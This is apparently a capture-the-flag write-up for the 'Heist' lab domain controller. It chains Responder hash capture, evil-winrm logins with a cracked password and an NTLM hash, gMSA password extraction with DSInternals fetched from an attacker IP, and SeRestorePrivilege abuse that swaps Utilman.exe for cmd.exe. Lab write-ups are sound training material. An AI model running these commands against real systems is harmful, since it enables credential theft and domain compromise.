
# Heist

## 8080

Submitting our own IP to the application on port 8080 while Responder is listening gives us a hash, which we can crack. Now logging in with evil-winrm:

```
evil-winrm -i 192.168.180.165 -u enox -p 'california'
```

![](/files/qAJpjIulPfPorxwxa4qJ)

Found a todo list; it suggests there is something to do with gMSA.

## gMSA

Now to find gMSA:

```
Get-ADServiceAccount -Filter * -Properties * | Select SamAccountName,PrincipalsAllowedToRetrieveManagedPassword,msDS-ManagedPasswordInterval,ServicePrincipalNames
```

Web Admins are allowed to retrieve the managed password, and we belong to Web Admins.

To get the password blob, keep the account and the blob in variables (`$mp` is used again below):

```
$gmsa = Get-ADServiceAccount -Identity svc_apache -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
```

Now using DSInternals to decode it. The module is fetched from our machine; note `-OutFile` rather than `-o`, which PowerShell rejects as an ambiguous parameter name:

```
wget http://192.168.45.167/DSInternals.zip -OutFile DSInternals.zip
Unblock-File DSInternals.zip
Expand-Archive DSInternals.zip
cd DSInternals
cd DSInternals   # the extracted archive nests a second DSInternals folder holding the module
Import-Module .\DSInternals.psd1
```

Now store the password as a PSCredential object:

```
$cred = New-Object System.Management.Automation.PSCredential "heist.offsec\svc_apache",(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
```

Now login as svc\_apache using PSSession:

```
Enter-PSSession -ComputerName DC01 -Credential $cred
```

![](/files/YVy4yGaUUnjGZZkr1UIe)

We can also get NTLM Hashes with:

```
$gmsa = Get-ADServiceAccount -Identity "svc_apache" -Properties "msDS-ManagedPassword"
$mp = $gmsa.'msDS-ManagedPassword'
(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword | ConvertTo-NTHash
```
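The blob `Get-ADServiceAccount` returns above, and that `ConvertFrom-ADManagedPasswordBlob` decodes, follows the MSDS-MANAGEDPASSWORD_BLOB layout from MS-ADTS; the Python below is an added example, not the page's or DSInternals' code, that builds a constructed blob and parses it back into the same fields. The sample password is a short constructed string where a real gMSA password is 256 random UTF-16 code units.

```python
import struct
from datetime import timedelta

# MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.19), all little-endian: Version(2)
# Reserved(2) Length(4) CurrentPasswordOffset(2) PreviousPasswordOffset(2)
# QueryPasswordIntervalOffset(2) UnchangedPasswordIntervalOffset(2), then the
# NUL-terminated UTF-16LE strings, 8-byte padding, two 64-bit 100 ns intervals.
HEADER = struct.Struct("<HHIHHHH")
TICKS_PER_SEC = 10_000_000


def build_blob(current, previous=None, query=timedelta(days=30),
               unchanged=timedelta(days=30)):
    """Constructed test input, laid out the way the DC stores it."""
    body = bytearray()
    cur_off = HEADER.size
    body += current.encode("utf-16-le") + b"\x00\x00"
    prev_off = 0  # 0 means no previous password is present
    if previous is not None:
        prev_off = HEADER.size + len(body)
        body += previous.encode("utf-16-le") + b"\x00\x00"
    body += b"\x00" * (-(HEADER.size + len(body)) % 8)  # align the intervals
    query_off = HEADER.size + len(body)
    body += struct.pack("<Q", int(query.total_seconds() * TICKS_PER_SEC))
    unch_off = HEADER.size + len(body)
    body += struct.pack("<Q", int(unchanged.total_seconds() * TICKS_PER_SEC))
    header = HEADER.pack(1, 0, HEADER.size + len(body), cur_off, prev_off,
                         query_off, unch_off)
    return header + bytes(body)


def _read_wstr(blob, off):
    """Read a NUL-terminated UTF-16LE string, scanning in 2-byte steps."""
    for end in range(off, len(blob) - 1, 2):
        if blob[end:end + 2] == b"\x00\x00":
            return blob[off:end].decode("utf-16-le")
    raise ValueError("unterminated password string")


def parse_blob(blob):
    """Return the same fields ConvertFrom-ADManagedPasswordBlob exposes."""
    version, reserved, length, cur_off, prev_off, q_off, u_off = HEADER.unpack_from(blob, 0)
    if version != 1 or reserved != 0:
        raise ValueError(f"unsupported blob version {version}")
    if length != len(blob):
        raise ValueError("Length field does not match blob size")

    def ticks(off):
        return struct.unpack_from("<Q", blob, off)[0]

    return {
        "CurrentPassword": _read_wstr(blob, cur_off),
        "PreviousPassword": _read_wstr(blob, prev_off) if prev_off else None,
        "QueryPasswordInterval": timedelta(seconds=ticks(q_off) / TICKS_PER_SEC),
        "UnchangedPasswordInterval": timedelta(seconds=ticks(u_off) / TICKS_PER_SEC),
    }
```

Anyone in PrincipalsAllowedToRetrieveManagedPassword receives this cleartext from a plain LDAP read, which is why that attribute, rather than the blob format, is the thing to audit.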

## SeRestorePrivilege

Now logging in with winrm with the hash:

```bash
evil-winrm -i 192.168.180.165 -u 'svc_apache$' -H '023145fc00ce8bab62704eb63ab7bdab'
```

Checking our privileges shows we have SeRestorePrivilege.

Following the SeRestorePrivilege entry on <https://github.com/gtworek/Priv2Admin>, we rename Utilman.exe out of the way and put cmd.exe in its place:

```
ren "C:/Windows/System32/Utilman.exe" Utilman.old
ren "C:/Windows/System32/cmd.exe" Utilman.exe
```

Now we can reach the lock screen with rdesktop:

```
rdesktop 192.168.180.254
```

Now press `win + U`, which launches the renamed cmd.exe. From there we can transfer rcat and execute it to get a proper shell.
